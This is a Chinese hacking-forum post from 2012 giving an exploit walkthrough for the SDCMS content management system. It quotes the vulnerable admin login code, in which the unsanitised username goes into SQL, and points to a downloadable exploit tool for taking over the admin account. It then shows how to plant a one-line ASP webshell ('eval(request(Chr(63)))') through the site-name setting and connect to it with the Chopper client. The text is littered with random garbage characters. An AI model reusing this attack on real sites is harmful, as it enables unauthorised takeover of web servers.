作者:T00LS 鬼哥4 J2 {/ g( O ~* U* p: l$ \
漏洞文件:后台目录/index.asp
8 L1 U5 L' X0 p5 Y. y- T
+ Q% A- E8 r& V! A: nSub Check
) F7 z& D0 h# r Dim username,password,code,getcode,Rs
( [/ i6 d1 _ I" z) { IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub
. U4 u( A7 D6 A/ R! ^" c( o1 T username=FilterText(Trim(Request.Form("username")),1)
3 \# B2 U& U) [8 v password=FilterText(Trim(Request.Form("password")),1)
) Y s6 y- Y. ~$ ~3 W code=Trim(Request.Form("yzm"))
. M8 z! K! F( t! {* W getcode=Session("SDCMSCode")
0 q" F! X6 ^. O" B: |2 c0 W IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died) ~- H3 s' ]( G- G- D+ i
IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied% L4 M# N [. E7 v7 c
IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied( T% i7 @+ A5 C; N
IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied
1 @; J5 s2 n1 v! W+ f IF username="" or password="" Then# s# l. t0 w) p& o6 [1 N
Echo "用户名或密码不能为空"ied; ]- u( i7 n0 M
Else
3 b% @! S7 {2 H9 F) i% m: y& q! B7 h Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")
$ w, ]" f9 N; o" @ IF Rs.Eof Then
Z M( q, ]3 j; p1 i; v+ N AddLog username,GetIp,"登录失败",1& g1 Z% @. h2 H4 _' I
Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"
, K7 e5 N4 K/ P; O$ _ ]: p6 o Else
4 }0 H2 M) p* [3 V7 T Add_Cookies "sdcms_id",Rs(0) i) d- I( l! L5 R1 h; e( E2 D. I$ H
Add_Cookies "sdcms_name",username
( E2 t/ S# c6 x Add_Cookies "sdcms_pwd",Rs(2)& B; m% J9 Y4 l
Add_Cookies "sdcms_admin",Rs(3)
* b% f9 g$ y- v4 O; d Add_Cookies "sdcms_alllever",Rs(4)
+ u6 H4 D6 @0 O8 R& L1 ]8 r& D Add_Cookies "sdcms_infolever",Rs(5)# O1 x/ }! X- }+ _" [
Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")+ {; C) m2 d! s( ]! k, ]
AddLog username,GetIp,"登录成功",1
* c2 n& m$ ^! Z '自动删除30天前的Log记录& x: X* i6 j' f" x3 L$ G
IF Sdcms_DataType Then5 q4 f) t" [; C, }* C# v. ?
Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")2 [% V& K3 X4 v4 _' S& c4 e/ d( }+ \
Else0 {5 }8 X/ u) ^ k2 M! a8 ~, N
Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")
4 ^) v. M; G8 Z# k5 R End IF
; @/ ]8 i, ^3 y8 q: ? Go("sdcms_index.asp")
, o# Q& m: t' @( S3 W End IF
j2 L+ Y" ~7 K: C6 r/ k+ [ Rs.Close
( f3 n, J# p1 z& i- a: Z1 x Set Rs=Nothing
& u- V& p, K0 O' y/ K End IF" s1 ~7 s1 K1 Q, [) l
End Sub0 U4 h9 z2 w6 c! v% g" t( L' j
- L! p7 T0 Q7 v0 o9 g
’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码
" r$ Z+ w! |* U2 E* p7 h- o: T& H' `7 j; ?/ [) `* B; P0 H, A- Y
Function FilterText(ByVal t0,ByVal t1)
5 n s" t6 z" i IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function$ q$ D- Z; T& J5 \
t0=Trim(t0)9 t% r& y. J# L3 Q/ S: a5 i3 G
Select Case t12 {6 T* H, G3 G- ~" n$ i
Case "1"' C4 w, N+ h5 ]1 q5 {
t0=Replace(t0,Chr(32),"")
d# m, |6 ~. J; o t0=Replace(t0,Chr(13),"")$ X- I& w E! G
t0=Replace(t0,Chr(10)&Chr(10),"")
, f7 G z% }! ]1 J0 W7 g6 b t0=Replace(t0,Chr(10),"")
, g$ h: s) c8 Z% \$ t, X Case "2"5 N4 s0 L& @8 o, v$ I& F3 T
t0=Replace(t0,Chr(8),"")'回格, }- Q" w% q. M2 _
t0=Replace(t0,Chr(9),"")'tab(水平制表符)
: }( ~# J. T1 O! C9 U$ _ t0=Replace(t0,Chr(10),"")'换行
: v& h. T% g) [4 T$ \# Y; d t0=Replace(t0,Chr(11),"")'tab(垂直制表符)- d* e1 ?6 T1 [! d! u# L# f% U( s
t0=Replace(t0,Chr(12),"")'换页! O6 Z0 B8 V+ H! s1 p
t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合
$ n' A, M1 {0 p9 K t0=Replace(t0,Chr(22),"")5 C2 V4 f: h3 P) q
t0=Replace(t0,Chr(32),"")'空格 SPACE7 z" [9 N/ [; q4 q. v# ]! J; Q
t0=Replace(t0,Chr(33),"")'! e: I- ~% j8 P) n- f
t0=Replace(t0,Chr(34),"")'"+ W4 G& N! G; P/ ] Z1 F- k7 z
t0=Replace(t0,Chr(35),"")'## B6 R) D/ H1 d) y
t0=Replace(t0,Chr(36),"")'$
) j2 G/ D+ H$ _) R. ?' e) y t0=Replace(t0,Chr(37),"")'%
' d1 h4 R* S6 m& x$ J* J+ b' Y t0=Replace(t0,Chr(38),"")'&" p) [9 @$ M7 B0 ^
t0=Replace(t0,Chr(39),"")''
$ f" ]- |7 a2 N, v7 v% ^ t0=Replace(t0,Chr(40),"")'(
. i" t* F# k N% s5 c" K t0=Replace(t0,Chr(41),"")')# l# C; y8 e% t! W
t0=Replace(t0,Chr(42),"")'*0 i# X N6 y# L: b
t0=Replace(t0,Chr(43),"")'+
7 {9 X/ Q' k( N7 j1 @6 ? t0=Replace(t0,Chr(44),"")',3 s7 {; P" }9 q0 ]( E& |
t0=Replace(t0,Chr(45),"")'-: M! g* z1 w% W5 L1 f+ F
t0=Replace(t0,Chr(46),"")'.
' m; x8 z0 `. A a( d! v/ W t0=Replace(t0,Chr(47),"")'/
3 _$ E3 J3 A1 n9 Z# s4 l4 d: v: ^ t0=Replace(t0,Chr(58),"")':+ ?9 K1 q o8 Q, a5 ^+ m( p2 ^7 `
t0=Replace(t0,Chr(59),"")';
$ z9 l& p n( `7 t, U t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>
# @# \; U/ A% C7 }- F$ T t0=Replace(t0,Chr(63),"")'?: F1 N& D1 R/ {+ q( ^1 o" O
t0=Replace(t0,Chr(64),"")'@
, [# ~% `1 Y- e3 e6 n t0=Replace(t0,Chr(91),"")'\
~! n1 t" y. R, W t0=Replace(t0,Chr(92),"")'\
* f% G( P8 v' W: w# U3 T8 a t0=Replace(t0,Chr(93),"")']3 m7 v, W- J3 O# K
t0=Replace(t0,Chr(94),"")'^/ g% E% A2 O! o# e
t0=Replace(t0,Chr(95),"")'_" x: f% U. @& |: i$ e
t0=Replace(t0,Chr(96),"")'`
a) E; s: o4 Q/ @5 B t0=Replace(t0,Chr(123),"")'{. j8 b# n5 {) x
t0=Replace(t0,Chr(124),"")'|2 a/ u: Q3 f" l `" U& l" c6 r
t0=Replace(t0,Chr(125),"")'}
0 i3 C" }4 @! w4 r t0=Replace(t0,Chr(126),"")'~5 p5 [% r; Y, s; y+ P" L- N2 ~
Case Else. a9 K' {' f5 ^! X1 f" D
t0=Replace(t0, "&", "&")
4 @3 {1 |0 }: q/ R l t0=Replace(t0, "'", "'")
9 R1 U) o$ }0 `; G! w: N# b* |, D t0=Replace(t0, """", """)1 `% O m' Z5 j
t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")2 y5 B2 ? W" c" |$ _) v, Z: A
End Select
, N% N% b( N) |% _0 |7 @ IF Instr(Lcase(t0),"expression")>0 Then+ W0 ]9 T: I% U( d# ]. h) _: D
t0=Replace(t0,"expression","e­xpression", 1, -1, 0)! Q V. g1 d4 l5 X+ @# j* K7 E3 w
End If( Y5 m6 [4 |$ Y, l
FilterText=t0
0 z8 Z! f6 Q# B% z" FEnd Function
( h: f+ _7 e. e2 `* E# m5 L: j1 y' `+ f; w
看到没。直接参数是1 只过滤) f9 _+ J Z7 H
t0=Replace(t0,Chr(32)," ")
( H T" L6 E# b2 ]! P6 P t0=Replace(t0,Chr(13),"")
3 p r) Y7 z4 S t0=Replace(t0,Chr(10)&Chr(10),"
% ?; m* R s. @$ u, d")& [5 y D9 ]( m( k8 j L. \, U
t0=Replace(t0,Chr(10),"
8 J% D7 h C [ s2 H")
8 e2 d$ g" f! ^. `漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!3 I, i2 p9 Y" c: d0 B# D: b% g
EXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP! o5 b9 O& u9 P5 Y0 y. l
& p5 j7 V- p9 G/ p! A5 g. ~* n测试:
* f; |! t- V! t, g, a( y C% D2 N# u$ i
4 U" b! _- K& U+ ]7 ? A$ m' }现在输入工具上验证码,然后点OK0 J) ^1 [- f% t& T" ^
) \4 }* U% p- z6 f, J) _8 e1 v% g- h/ [2 _1 O
看到我们直接进入后台管理界面了,呵呵!
u( O/ t% c3 u% Y# o% l# ^$ [8 j( }" o9 W+ h; R3 R- b5 a
. F$ |3 M# X+ [5 F7 n. B
2 I- U" u3 \0 P+ E, S这样直接进入后台了。。。。: z8 N( m3 A* n
" z- G( b: O' Q! d3 q" j
. T* R0 p) I% g
0 L' G+ o' w$ C: eSDCMS提权:
% d$ y5 |5 I @2 _$ f2 W! f+ _# l$ g' d8 X8 }
方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?
9 e* T4 Z- ^* J- Q3 V% m$ G* G, e" M" h$ P( _3 I; X- x; ~
! h ^; s# I- @5 w* P
3 a9 N) r0 k% v% i
OK,现在用菜刀连接下!
* ]+ B( }+ c" `9 C0 R1 y, N, |; X: ?% k& U
" z. ~. |2 Z0 W) d: d
8 k1 h9 i- D& f; t# a6 ~1 d. t+ i; i & O+ D: d% Z* P$ b# {
1 ^% u5 Y; Q/ G: n. u- W
|
发表于 2012-11-9 20:57:02
收藏
支持
反对